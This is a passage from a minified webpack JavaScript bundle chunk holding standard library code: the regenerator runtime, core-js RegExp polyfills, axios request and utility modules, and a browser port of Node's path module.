                      r('next', t, a, s);
                    },
                    function (t) {
                      r('throw', t, a, s);
                    }
                  )
                : e.resolve(l).then(
                    function (t) {
                      (u.value = t), a(u);
                    },
                    function (t) {
                      return r('throw', t, a, s);
                    }
                  );
            }
            s(c.arg);
          }
          var o;
          function i(t, n) {
            function i() {
              return new e(function (e, o) {
                r(t, n, e, o);
              });
            }
            return (o = o ? o.then(i, i) : i());
          }
          this._invoke = i;
        }
        function k(t, e, r) {
          var n = l;
          return function (o, i) {
            if (n === d) throw new Error('Generator is already running');
            if (n === h) {
              if ('throw' === o) throw i;
              return S();
            }
            (r.method = o), (r.arg = i);
            while (1) {
              var a = r.delegate;
              if (a) {
                var s = A(a, r);
                if (s) {
                  if (s === v) continue;
                  return s;
                }
              }
              if ('next' === r.method) r.sent = r._sent = r.arg;
              else if ('throw' === r.method) {
                if (n === l) throw ((n = h), r.arg);
                r.dispatchException(r.arg);
              } else 'return' === r.method && r.abrupt('return', r.arg);
              n = d;
              var c = f(t, e, r);
              if ('normal' === c.type) {
                if (((n = r.done ? h : p), c.arg === v)) continue;
                return { value: c.arg, done: r.done };
              }
              'throw' === c.type &&
                ((n = h), (r.method = 'throw'), (r.arg = c.arg));
            }
          };
        }
        function A(t, r) {
          var n = t.iterator[r.method];
          if (n === e) {
            if (((r.delegate = null), 'throw' === r.method)) {
              if (
                t.iterator['return'] &&
                ((r.method = 'return'),
                (r.arg = e),
                A(t, r),
                'throw' === r.method)
              )
                return v;
              (r.method = 'throw'),
                (r.arg = new TypeError(
                  "The iterator does not provide a 'throw' method"
                ));
            }
            return v;
          }
          var o = f(n, t.iterator, r.arg);
          if ('throw' === o.type)
            return (
              (r.method = 'throw'), (r.arg = o.arg), (r.delegate = null), v
            );
          var i = o.arg;
          return i
            ? i.done
              ? ((r[t.resultName] = i.value),
                (r.next = t.nextLoc),
                'return' !== r.method && ((r.method = 'next'), (r.arg = e)),
                (r.delegate = null),
                v)
              : i
            : ((r.method = 'throw'),
              (r.arg = new TypeError('iterator result is not an object')),
              (r.delegate = null),
              v);
        }
        function j(t) {
          var e = { tryLoc: t[0] };
          1 in t && (e.catchLoc = t[1]),
            2 in t && ((e.finallyLoc = t[2]), (e.afterLoc = t[3])),
            this.tryEntries.push(e);
        }
        function F(t) {
          var e = t.completion || {};
          (e.type = 'normal'), delete e.arg, (t.completion = e);
        }
        function D(t) {
          (this.tryEntries = [{ tryLoc: 'root' }]),
            t.forEach(j, this),
            this.reset(!0);
        }
        function R(t) {
          if (t) {
            var r = t[i];
            if (r) return r.call(t);
            if ('function' === typeof t.next) return t;
            if (!isNaN(t.length)) {
              var o = -1,
                a = function r() {
                  while (++o < t.length)
                    if (n.call(t, o)) return (r.value = t[o]), (r.done = !1), r;
                  return (r.value = e), (r.done = !0), r;
                };
              return (a.next = a);
            }
          }
          return { next: S };
        }
        function S() {
          return { value: e, done: !0 };
        }
        return (
          (g.prototype = x.constructor = y),
          (y.constructor = g),
          (g.displayName = c(y, s, 'GeneratorFunction')),
          (t.isGeneratorFunction = function (t) {
            var e = 'function' === typeof t && t.constructor;
            return (
              !!e &&
              (e === g || 'GeneratorFunction' === (e.displayName || e.name))
            );
          }),
          (t.mark = function (t) {
            return (
              Object.setPrototypeOf
                ? Object.setPrototypeOf(t, y)
                : ((t.__proto__ = y), c(t, s, 'GeneratorFunction')),
              (t.prototype = Object.create(x)),
              t
            );
          }),
          (t.awrap = function (t) {
            return { __await: t };
          }),
          C(E.prototype),
          (E.prototype[a] = function () {
            return this;
          }),
          (t.AsyncIterator = E),
          (t.async = function (e, r, n, o, i) {
            void 0 === i && (i = Promise);
            var a = new E(u(e, r, n, o), i);
            return t.isGeneratorFunction(r)
              ? a
              : a.next().then(function (t) {
                  return t.done ? t.value : a.next();
                });
          }),
          C(x),
          c(x, s, 'Generator'),
          (x[i] = function () {
            return this;
          }),
          (x.toString = function () {
            return '[object Generator]';
          }),
          (t.keys = function (t) {
            var e = [];
            for (var r in t) e.push(r);
            return (
              e.reverse(),
              function r() {
                while (e.length) {
                  var n = e.pop();
                  if (n in t) return (r.value = n), (r.done = !1), r;
                }
                return (r.done = !0), r;
              }
            );
          }),
          (t.values = R),
          (D.prototype = {
            constructor: D,
            reset: function (t) {
              if (
                ((this.prev = 0),
                (this.next = 0),
                (this.sent = this._sent = e),
                (this.done = !1),
                (this.delegate = null),
                (this.method = 'next'),
                (this.arg = e),
                this.tryEntries.forEach(F),
                !t)
              )
                for (var r in this)
                  't' === r.charAt(0) &&
                    n.call(this, r) &&
                    !isNaN(+r.slice(1)) &&
                    (this[r] = e);
            },
            stop: function () {
              this.done = !0;
              var t = this.tryEntries[0],
                e = t.completion;
              if ('throw' === e.type) throw e.arg;
              return this.rval;
            },
            dispatchException: function (t) {
              if (this.done) throw t;
              var r = this;
              function o(n, o) {
                return (
                  (s.type = 'throw'),
                  (s.arg = t),
                  (r.next = n),
                  o && ((r.method = 'next'), (r.arg = e)),
                  !!o
                );
              }
              for (var i = this.tryEntries.length - 1; i >= 0; --i) {
                var a = this.tryEntries[i],
                  s = a.completion;
                if ('root' === a.tryLoc) return o('end');
                if (a.tryLoc <= this.prev) {
                  var c = n.call(a, 'catchLoc'),
                    u = n.call(a, 'finallyLoc');
                  if (c && u) {
                    if (this.prev < a.catchLoc) return o(a.catchLoc, !0);
                    if (this.prev < a.finallyLoc) return o(a.finallyLoc);
                  } else if (c) {
                    if (this.prev < a.catchLoc) return o(a.catchLoc, !0);
                  } else {
                    if (!u)
                      throw new Error('try statement without catch or finally');
                    if (this.prev < a.finallyLoc) return o(a.finallyLoc);
                  }
                }
              }
            },
            abrupt: function (t, e) {
              for (var r = this.tryEntries.length - 1; r >= 0; --r) {
                var o = this.tryEntries[r];
                if (
                  o.tryLoc <= this.prev &&
                  n.call(o, 'finallyLoc') &&
                  this.prev < o.finallyLoc
                ) {
                  var i = o;
                  break;
                }
              }
              i &&
                ('break' === t || 'continue' === t) &&
                i.tryLoc <= e &&
                e <= i.finallyLoc &&
                (i = null);
              var a = i ? i.completion : {};
              return (
                (a.type = t),
                (a.arg = e),
                i
                  ? ((this.method = 'next'), (this.next = i.finallyLoc), v)
                  : this.complete(a)
              );
            },
            complete: function (t, e) {
              if ('throw' === t.type) throw t.arg;
              return (
                'break' === t.type || 'continue' === t.type
                  ? (this.next = t.arg)
                  : 'return' === t.type
                  ? ((this.rval = this.arg = t.arg),
                    (this.method = 'return'),
                    (this.next = 'end'))
                  : 'normal' === t.type && e && (this.next = e),
                v
              );
            },
            finish: function (t) {
              for (var e = this.tryEntries.length - 1; e >= 0; --e) {
                var r = this.tryEntries[e];
                if (r.finallyLoc === t)
                  return this.complete(r.completion, r.afterLoc), F(r), v;
              }
            },
            catch: function (t) {
              for (var e = this.tryEntries.length - 1; e >= 0; --e) {
                var r = this.tryEntries[e];
                if (r.tryLoc === t) {
                  var n = r.completion;
                  if ('throw' === n.type) {
                    var o = n.arg;
                    F(r);
                  }
                  return o;
                }
              }
              throw new Error('illegal catch attempt');
            },
            delegateYield: function (t, r, n) {
              return (
                (this.delegate = { iterator: R(t), resultName: r, nextLoc: n }),
                'next' === this.method && (this.arg = e),
                v
              );
            },
          }),
          t
        );
      })(t.exports);
      try {
        regeneratorRuntime = n;
      } catch (o) {
        Function('r', 'regeneratorRuntime = r')(n);
      }
    },
    '9ebf': function (t, e, r) {
      'use strict';
      r('820e');
    },
    '9f7f': function (t, e, r) {
      'use strict';
      var n = r('d039');
      function o(t, e) {
        return RegExp(t, e);
      }
      (e.UNSUPPORTED_Y = n(function () {
        var t = o('a', 'y');
        return (t.lastIndex = 2), null != t.exec('abcd');
      })),
        (e.BROKEN_CARET = n(function () {
          var t = o('^r', 'gy');
          return (t.lastIndex = 2), null != t.exec('str');
        }));
    },
    ac1f: function (t, e, r) {
      'use strict';
      var n = r('23e7'),
        o = r('9263');
      n({ target: 'RegExp', proto: !0, forced: /./.exec !== o }, { exec: o });
    },
    ad6d: function (t, e, r) {
      'use strict';
      var n = r('825a');
      t.exports = function () {
        var t = n(this),
          e = '';
        return (
          t.global && (e += 'g'),
          t.ignoreCase && (e += 'i'),
          t.multiline && (e += 'm'),
          t.dotAll && (e += 's'),
          t.unicode && (e += 'u'),
          t.sticky && (e += 'y'),
          e
        );
      };
    },
    b50d: function (t, e, r) {
      'use strict';
      var n = r('c532'),
        o = r('467f'),
        i = r('7aac'),
        a = r('30b5'),
        s = r('83b9'),
        c = r('c345'),
        u = r('3934'),
        f = r('2d83');
      t.exports = function (t) {
        return new Promise(function (e, r) {
          var l = t.data,
            p = t.headers;
          n.isFormData(l) && delete p['Content-Type'];
          var d = new XMLHttpRequest();
          if (t.auth) {
            var h = t.auth.username || '',
              v = t.auth.password
                ? unescape(encodeURIComponent(t.auth.password))
                : '';
            p.Authorization = 'Basic ' + btoa(h + ':' + v);
          }
          var m = s(t.baseURL, t.url);
          if (
            (d.open(
              t.method.toUpperCase(),
              a(m, t.params, t.paramsSerializer),
              !0
            ),
            (d.timeout = t.timeout),
            (d.onreadystatechange = function () {
              if (
                d &&
                4 === d.readyState &&
                (0 !== d.status ||
                  (d.responseURL && 0 === d.responseURL.indexOf('file:')))
              ) {
                var n =
                    'getAllResponseHeaders' in d
                      ? c(d.getAllResponseHeaders())
                      : null,
                  i =
                    t.responseType && 'text' !== t.responseType
                      ? d.response
                      : d.responseText,
                  a = {
                    data: i,
                    status: d.status,
                    statusText: d.statusText,
                    headers: n,
                    config: t,
                    request: d,
                  };
                o(e, r, a), (d = null);
              }
            }),
            (d.onabort = function () {
              d && (r(f('Request aborted', t, 'ECONNABORTED', d)), (d = null));
            }),
            (d.onerror = function () {
              r(f('Network Error', t, null, d)), (d = null);
            }),
            (d.ontimeout = function () {
              var e = 'timeout of ' + t.timeout + 'ms exceeded';
              t.timeoutErrorMessage && (e = t.timeoutErrorMessage),
                r(f(e, t, 'ECONNABORTED', d)),
                (d = null);
            }),
            n.isStandardBrowserEnv())
          ) {
            var g =
              (t.withCredentials || u(m)) && t.xsrfCookieName
                ? i.read(t.xsrfCookieName)
                : void 0;
            g && (p[t.xsrfHeaderName] = g);
          }
          if (
            ('setRequestHeader' in d &&
              n.forEach(p, function (t, e) {
                'undefined' === typeof l && 'content-type' === e.toLowerCase()
                  ? delete p[e]
                  : d.setRequestHeader(e, t);
              }),
            n.isUndefined(t.withCredentials) ||
              (d.withCredentials = !!t.withCredentials),
            t.responseType)
          )
            try {
              d.responseType = t.responseType;
            } catch (y) {
              if ('json' !== t.responseType) throw y;
            }
          'function' === typeof t.onDownloadProgress &&
            d.addEventListener('progress', t.onDownloadProgress),
            'function' === typeof t.onUploadProgress &&
              d.upload &&
              d.upload.addEventListener('progress', t.onUploadProgress),
            t.cancelToken &&
              t.cancelToken.promise.then(function (t) {
                d && (d.abort(), r(t), (d = null));
              }),
            l || (l = null),
            d.send(l);
        });
      };
    },
    b727: function (t, e, r) {
      var n = r('0366'),
        o = r('44ad'),
        i = r('7b0b'),
        a = r('50c4'),
        s = r('65f0'),
        c = [].push,
        u = function (t) {
          var e = 1 == t,
            r = 2 == t,
            u = 3 == t,
            f = 4 == t,
            l = 6 == t,
            p = 7 == t,
            d = 5 == t || l;
          return function (h, v, m, g) {
            for (
              var y,
                _,
                b = i(h),
                w = o(b),
                x = n(v, m, 3),
                C = a(w.length),
                E = 0,
                k = g || s,
                A = e ? k(h, C) : r || p ? k(h, 0) : void 0;
              C > E;
              E++
            )
              if ((d || E in w) && ((y = w[E]), (_ = x(y, E, b)), t))
                if (e) A[E] = _;
                else if (_)
                  switch (t) {
                    case 3:
                      return !0;
                    case 5:
                      return y;
                    case 6:
                      return E;
                    case 2:
                      c.call(A, y);
                  }
                else
                  switch (t) {
                    case 4:
                      return !1;
                    case 7:
                      c.call(A, y);
                  }
            return l ? -1 : u || f ? f : A;
          };
        };
      t.exports = {
        forEach: u(0),
        map: u(1),
        filter: u(2),
        some: u(3),
        every: u(4),
        find: u(5),
        findIndex: u(6),
        filterOut: u(7),
      };
    },
    bc3a: function (t, e, r) {
      t.exports = r('cee4');
    },
    c345: function (t, e, r) {
      'use strict';
      var n = r('c532'),
        o = [
          'age',
          'authorization',
          'content-length',
          'content-type',
          'etag',
          'expires',
          'from',
          'host',
          'if-modified-since',
          'if-unmodified-since',
          'last-modified',
          'location',
          'max-forwards',
          'proxy-authorization',
          'referer',
          'retry-after',
          'user-agent',
        ];
      t.exports = function (t) {
        var e,
          r,
          i,
          a = {};
        return t
          ? (n.forEach(t.split('\n'), function (t) {
              if (
                ((i = t.indexOf(':')),
                (e = n.trim(t.substr(0, i)).toLowerCase()),
                (r = n.trim(t.substr(i + 1))),
                e)
              ) {
                if (a[e] && o.indexOf(e) >= 0) return;
                a[e] =
                  'set-cookie' === e
                    ? (a[e] ? a[e] : []).concat([r])
                    : a[e]
                    ? a[e] + ', ' + r
                    : r;
              }
            }),
            a)
          : a;
      };
    },
    c401: function (t, e, r) {
      'use strict';
      var n = r('c532');
      t.exports = function (t, e, r) {
        return (
          n.forEach(r, function (r) {
            t = r(t, e);
          }),
          t
        );
      };
    },
    c532: function (t, e, r) {
      'use strict';
      var n = r('1d2b'),
        o = Object.prototype.toString;
      function i(t) {
        return '[object Array]' === o.call(t);
      }
      function a(t) {
        return 'undefined' === typeof t;
      }
      function s(t) {
        return (
          null !== t &&
          !a(t) &&
          null !== t.constructor &&
          !a(t.constructor) &&
          'function' === typeof t.constructor.isBuffer &&
          t.constructor.isBuffer(t)
        );
      }
      function c(t) {
        return '[object ArrayBuffer]' === o.call(t);
      }
      function u(t) {
        return 'undefined' !== typeof FormData && t instanceof FormData;
      }
      function f(t) {
        var e;
        return (
          (e =
            'undefined' !== typeof ArrayBuffer && ArrayBuffer.isView
              ? ArrayBuffer.isView(t)
              : t && t.buffer && t.buffer instanceof ArrayBuffer),
          e
        );
      }
      function l(t) {
        return 'string' === typeof t;
      }
      function p(t) {
        return 'number' === typeof t;
      }
      function d(t) {
        return null !== t && 'object' === typeof t;
      }
      function h(t) {
        if ('[object Object]' !== o.call(t)) return !1;
        var e = Object.getPrototypeOf(t);
        return null === e || e === Object.prototype;
      }
      function v(t) {
        return '[object Date]' === o.call(t);
      }
      function m(t) {
        return '[object File]' === o.call(t);
      }
      function g(t) {
        return '[object Blob]' === o.call(t);
      }
      function y(t) {
        return '[object Function]' === o.call(t);
      }
      function _(t) {
        return d(t) && y(t.pipe);
      }
      function b(t) {
        return (
          'undefined' !== typeof URLSearchParams && t instanceof URLSearchParams
        );
      }
      function w(t) {
        return t.replace(/^\s*/, '').replace(/\s*$/, '');
      }
      function x() {
        return (
          ('undefined' === typeof navigator ||
            ('ReactNative' !== navigator.product &&
              'NativeScript' !== navigator.product &&
              'NS' !== navigator.product)) &&
          'undefined' !== typeof window &&
          'undefined' !== typeof document
        );
      }
      function C(t, e) {
        if (null !== t && 'undefined' !== typeof t)
          if (('object' !== typeof t && (t = [t]), i(t)))
            for (var r = 0, n = t.length; r < n; r++) e.call(null, t[r], r, t);
          else
            for (var o in t)
              Object.prototype.hasOwnProperty.call(t, o) &&
                e.call(null, t[o], o, t);
      }
      function E() {
        var t = {};
        function e(e, r) {
          h(t[r]) && h(e)
            ? (t[r] = E(t[r], e))
            : h(e)
            ? (t[r] = E({}, e))
            : i(e)
            ? (t[r] = e.slice())
            : (t[r] = e);
        }
        for (var r = 0, n = arguments.length; r < n; r++) C(arguments[r], e);
        return t;
      }
      function k(t, e, r) {
        return (
          C(e, function (e, o) {
            t[o] = r && 'function' === typeof e ? n(e, r) : e;
          }),
          t
        );
      }
      function A(t) {
        return 65279 === t.charCodeAt(0) && (t = t.slice(1)), t;
      }
      t.exports = {
        isArray: i,
        isArrayBuffer: c,
        isBuffer: s,
        isFormData: u,
        isArrayBufferView: f,
        isString: l,
        isNumber: p,
        isObject: d,
        isPlainObject: h,
        isUndefined: a,
        isDate: v,
        isFile: m,
        isBlob: g,
        isFunction: y,
        isStream: _,
        isURLSearchParams: b,
        isStandardBrowserEnv: x,
        forEach: C,
        merge: E,
        extend: k,
        trim: w,
        stripBOM: A,
      };
    },
    c8af: function (t, e, r) {
      'use strict';
      var n = r('c532');
      t.exports = function (t, e) {
        n.forEach(t, function (r, n) {
          n !== e &&
            n.toUpperCase() === e.toUpperCase() &&
            ((t[e] = r), delete t[n]);
        });
      };
    },
    cee4: function (t, e, r) {
      'use strict';
      var n = r('c532'),
        o = r('1d2b'),
        i = r('0a06'),
        a = r('4a7b'),
        s = r('2444');
      function c(t) {
        var e = new i(t),
          r = o(i.prototype.request, e);
        return n.extend(r, i.prototype, e), n.extend(r, e), r;
      }
      var u = c(s);
      (u.Axios = i),
        (u.create = function (t) {
          return c(a(u.defaults, t));
        }),
        (u.Cancel = r('7a77')),
        (u.CancelToken = r('8df4')),
        (u.isCancel = r('2e67')),
        (u.all = function (t) {
          return Promise.all(t);
        }),
        (u.spread = r('0df6')),
        (u.isAxiosError = r('5f02')),
        (t.exports = u),
        (t.exports.default = u);
    },
    d784: function (t, e, r) {
      'use strict';
      r('ac1f');
      var n = r('6eeb'),
        o = r('9263'),
        i = r('d039'),
        a = r('b622'),
        s = r('9112'),
        c = a('species'),
        u = RegExp.prototype,
        f = !i(function () {
          var t = /./;
          return (
            (t.exec = function () {
              var t = [];
              return (t.groups = { a: '7' }), t;
            }),
            '7' !== ''.replace(t, '$<a>')
          );
        }),
        l = (function () {
          return '$0' === 'a'.replace(/./, '$0');
        })(),
        p = a('replace'),
        d = (function () {
          return !!/./[p] && '' === /./[p]('a', '$0');
        })(),
        h = !i(function () {
          var t = /(?:)/,
            e = t.exec;
          t.exec = function () {
            return e.apply(this, arguments);
          };
          var r = 'ab'.split(t);
          return 2 !== r.length || 'a' !== r[0] || 'b' !== r[1];
        });
      t.exports = function (t, e, r, p) {
        var v = a(t),
          m = !i(function () {
            var e = {};
            return (
              (e[v] = function () {
                return 7;
              }),
              7 != ''[t](e)
            );
          }),
          g =
            m &&
            !i(function () {
              var e = !1,
                r = /a/;
              return (
                'split' === t &&
                  ((r = {}),
                  (r.constructor = {}),
                  (r.constructor[c] = function () {
                    return r;
                  }),
                  (r.flags = ''),
                  (r[v] = /./[v])),
                (r.exec = function () {
                  return (e = !0), null;
                }),
                r[v](''),
                !e
              );
            });
        if (
          !m ||
          !g ||
          ('replace' === t && (!f || !l || d)) ||
          ('split' === t && !h)
        ) {
          var y = /./[v],
            _ = r(
              v,
              ''[t],
              function (t, e, r, n, i) {
                var a = e.exec;
                return a === o || a === u.exec
                  ? m && !i
                    ? { done: !0, value: y.call(e, r, n) }
                    : { done: !0, value: t.call(r, e, n) }
                  : { done: !1 };
              },
              {
                REPLACE_KEEPS_$0: l,
                REGEXP_REPLACE_SUBSTITUTES_UNDEFINED_CAPTURE: d,
              }
            ),
            b = _[0],
            w = _[1];
          n(String.prototype, t, b),
            n(
              u,
              v,
              2 == e
                ? function (t, e) {
                    return w.call(t, this, e);
                  }
                : function (t) {
                    return w.call(t, this);
                  }
            );
        }
        p && s(u[v], 'sham', !0);
      };
    },
    d925: function (t, e, r) {
      'use strict';
      t.exports = function (t) {
        return /^([a-z][a-z\d\+\-\.]*:)?\/\//i.test(t);
      };
    },
    df7c: function (t, e, r) {
      (function (t) {
        function r(t, e) {
          for (var r = 0, n = t.length - 1; n >= 0; n--) {
            var o = t[n];
            '.' === o
              ? t.splice(n, 1)
              : '..' === o
              ? (t.splice(n, 1), r++)
              : r && (t.splice(n, 1), r--);
          }
          if (e) for (; r--; r) t.unshift('..');
          return t;
        }
        function n(t) {
          'string' !== typeof t && (t += '');
          var e,
            r = 0,
            n = -1,
            o = !0;
          for (e = t.length - 1; e >= 0; --e)
            if (47 === t.charCodeAt(e)) {
              if (!o) {
                r = e + 1;
                break;
              }
            } else -1 === n && ((o = !1), (n = e + 1));
          return -1 === n ? '' : t.slice(r, n);
        }
        function o(t, e) {
          if (t.filter) return t.filter(e);
          for (var r = [], n = 0; n < t.length; n++)
            e(t[n], n, t) && r.push(t[n]);
          return r;
        }
        (e.resolve = function () {
          for (
            var e = '', n = !1, i = arguments.length - 1;
            i >= -1 && !n;
            i--
          ) {
            var a = i >= 0 ? arguments[i] : t.cwd();
            if ('string' !== typeof a)
              throw new TypeError('Arguments to path.resolve must be strings');
            a && ((e = a + '/' + e), (n = '/' === a.charAt(0)));
          }
          return (
            (e = r(
              o(e.split('/'), function (t) {
                return !!t;
              }),
              !n
            ).join('/')),
            (n ? '/' : '') + e || '.'
          );
        }),
          (e.normalize = function (t) {
            var n = e.isAbsolute(t),
              a = '/' === i(t, -1);
            return (
              (t = r(
                o(t.split('/'), function (t) {
                  return !!t;
                }),
                !n
              ).join('/')),
              t || n || (t = '.'),
              t && a && (t += '/'),
              (n ? '/' : '') + t
            );
          }),
          (e.isAbsolute = function (t) {
            return '/' === t.charAt(0);
          }),
          (e.join = function () {
            var t = Array.prototype.slice.call(arguments, 0);
            return e.normalize(
              o(t, function (t, e) {
                if ('string' !== typeof t)
                  throw new TypeError('Arguments to path.join must be strings');
                return t;
              }).join('/')
            );
          }),
          (e.relative = function (t, r) {
            function n(t) {
              for (var e = 0; e < t.length; e++) if ('' !== t[e]) break;
              for (var r = t.length - 1; r >= 0; r--) if ('' !== t[r]) break;
              return e > r ? [] : t.slice(e, r - e + 1);
            }
            (t = e.resolve(t).substr(1)), (r = e.resolve(r).substr(1));
            for (
              var o = n(t.split('/')),
                i = n(r.split('/')),
                a = Math.min(o.length, i.length),
                s = a,
                c = 0;
              c < a;
              c++
            )
              if (o[c] !== i[c]) {
                s = c;
                break;
              }
            var u = [];
            for (c = s; c < o.length; c++) u.push('..');
            return (u = u.concat(i.slice(s))), u.join('/');
          }),
          (e.sep = '/'),
          (e.delimiter = ':'),
          (e.dirname = function (t) {
            if (('string' !== typeof t && (t += ''), 0 === t.length))
              return '.';
            for (
              var e = t.charCodeAt(0),
                r = 47 === e,
                n = -1,
                o = !0,
                i = t.length - 1;
              i >= 1;
              --i
            )
              if (((e = t.charCodeAt(i)), 47 === e)) {
                if (!o) {
                  n = i;
                  break;
                }
              } else o = !1;
            return -1 === n
              ? r
                ? '/'
                : '.'
              : r && 1 === n
              ? '/'
              : t.slice(0, n);
          }),
          (e.basename = function (t, e) {
            var r = n(t);
            return (
              e &&
                r.substr(-1 * e.length) === e &&
                (r = r.substr(0, r.length - e.length)),
              r
            );
          }),
          (e.extname = function (t) {
            'string' !== typeof t && (t += '');
            for (
              var e = -1, r = 0, n = -1, o = !0, i = 0, a = t.length - 1;
              a >= 0;
              --a
            ) {
              var s = t.charCodeAt(a);
              if (47 !== s)
                -1 === n && ((o = !1), (n = a + 1)),
                  46 === s
                    ? -1 === e
                      ? (e = a)
                      : 1 !== i && (i = 1)
                    : -1 !== e && (i = -1);
              else if (!o) {
                r = a + 1;
                break;
              }
            }
            return -1 === e ||
              -1 === n ||
              0 === i ||
              (1 === i && e === n - 1 && e === r + 1)
              ? ''
              : t.slice(e, n);
          });
        var i =
          'b' === 'ab'.substr(-1)
            ? function (t, e, r) {
                return t.substr(e, r);
              }
            : function (t, e, r) {
                return e < 0 && (e = t.length + e), t.substr(e, r);
              };
      }).call(this, r('4362'));
    },
    e683: function (t, e, r) {
      'use strict';
      t.exports = function (t, e) {
        return e ? t.replace(/\/+$/, '') + '/' + e.replace(/^\/+/, '') : t;
      };
    },
    e8b5: function (t, e, r) {
      var n = r('c6b6');
      t.exports =
        Array.isArray ||
        function (t) {
          return 'Array' == n(t);
        };
    },
    f6b4: function (t, e, r) {
      'use strict';
      var n = r('c532');
      function o() {
        this.handlers = [];
      }
      (o.prototype.use = function (t, e) {
        return (
          this.handlers.push({ fulfilled: t, rejected: e }),
          this.handlers.length - 1
        );
      }),
        (o.prototype.eject = function (t) {
          this.handlers[t] && (this.handlers[t] = null);
        }),
        (o.prototype.forEach = function (t) {
          n.forEach(this.handlers, function (e) {
            null !== e && t(e);
          });
        }),
        (t.exports = o);
    },
  },
]);
//# sourceMappingURL=chunk-ebcca810.0be768b5.js.map